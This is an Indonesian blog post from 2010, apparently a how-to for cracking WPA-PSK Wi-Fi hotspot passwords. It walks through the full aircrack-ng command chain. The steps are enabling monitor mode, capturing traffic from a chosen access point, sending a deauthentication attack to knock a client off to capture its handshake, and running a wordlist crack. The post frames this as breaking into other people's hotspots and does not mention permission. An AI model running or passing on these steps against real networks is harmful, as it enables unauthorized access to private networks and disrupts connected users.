TUTORIAL CRACKING PASSWORD HOTSPOT WPA-PSK DENGAN LINUX BACKTRACK

TUTORIAL CRACKING PASSWORD HOTSPOT WPA-PSK DENGAN LINUX BACKTRACK

Post by Admin on Mon Jun 07, 2010 8:38 pm

Kali ini, saya akan mencoba sedkit memberi penejelasan bagaimana sih cara membobol password hotspot yang bertipe wpa-psk dengan mudah.
Cara ini bisa menggunakan linux backtrack 4 final release atau linux apapun tertama asal sudah terinstall aplikasi aircrack-ng. Tidak berlama-lama mari simak artikel berikut.
Pertama, siapkan CD Live Backtrack atau bisa make linux ubuntu dengan menginstall aplikasi aircrack-ng. Ketik perintah di bawah untuk menginstall aircrack-ng di linux ubuntu
sudo apt-get install aircrack-ng

Kedua, masuk ke dekstop dengan perintah ~# startx (untuk yang pakai backtrack)
Ketiga, buka konsole (terminal) dan ketikkan perintah untuk melihat interface device yang ada
ifconfig -a
Keempat, ketikkan perintah di bawah untuk mengaktifkan interface wlan0
ifconfig wlan0 up
Kelima, sekarang gunakan aplikasi airmon-ng untuk airmon-ng membuat virtual interface mode monitor dengan mengetikkan perintah di bawah.
airmon-ng start wlan0
Keenam, monitorlah jaringan di sekitar kamu. Caranya ketiklah perintah ini.
airodump-ng mon0
catatan : mon0 adalah interface virtual hasil dari airmon-ng tadi
Ketujuh, fokuskan monitoring jaringan hotspot yang ingin kita bobol passwordnya. Ketik lagi perintah berikut.
airodump-ng -w coba –channel 11 –bssid 001122334455 mon0
keterangan: memonitoring khusus jaringan yang memiliki bssid 00:11:22:33:44:55 pada channel 11 dan hasil dari monitoring di tulis
                   pada file yang bernama ‘coba’
Selanjutnya, gunakan serangan dengan cara disconnect salah satu client untuk mendapatkan paket handshake yang dibutuhkan untuk proses cracking
aireplay-ng -0 1 -a 001122334455 -c oo1cbfa13fe3 mon0
keterangan: aireplay-ng digunakan untuk mendisconnect salah satu client yaitu 00:1C:BF:A1:3F:E3 untuk mendapatkan paket
                  handshake yang dibutuhkan untuk proses cracking
-0 : mode serangan deAuthentication
1 : dilakukan sebanyak 1x deAuth
Terakhir, setelah mendapatkan paket handshake, selanjutnya adalah proses cracking dengan menggunakan aircrack dan file password dengan existensi .lst atau .txt dengan perintah
aircrack-ng coba*.cap -w /pentest/passwords/wordlists/listpass.txt
keterangan : listpass.txt adalah file password yang saya buat sendiri dan terletak pada /pentest/passwords/wordlists/listpass.txt
NB,,,, keberhasilan proses cracking tergantung ada tidaknya password yang ada di list password dengan password yang sebenarnya. Jika password yang digunakan pada jaringan tersebut ada di list password maka proses cracking akan berhasil dan jika password list yang kita miliki tidak mencatat password yang digunakan pada jaringan tersebut kemungkinan keberhasilan proses cracking akan gagal. Dan akhirnya, yang sedikit dari saya ini semoga membantu buat pengetahuan. Selamat mencoba

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: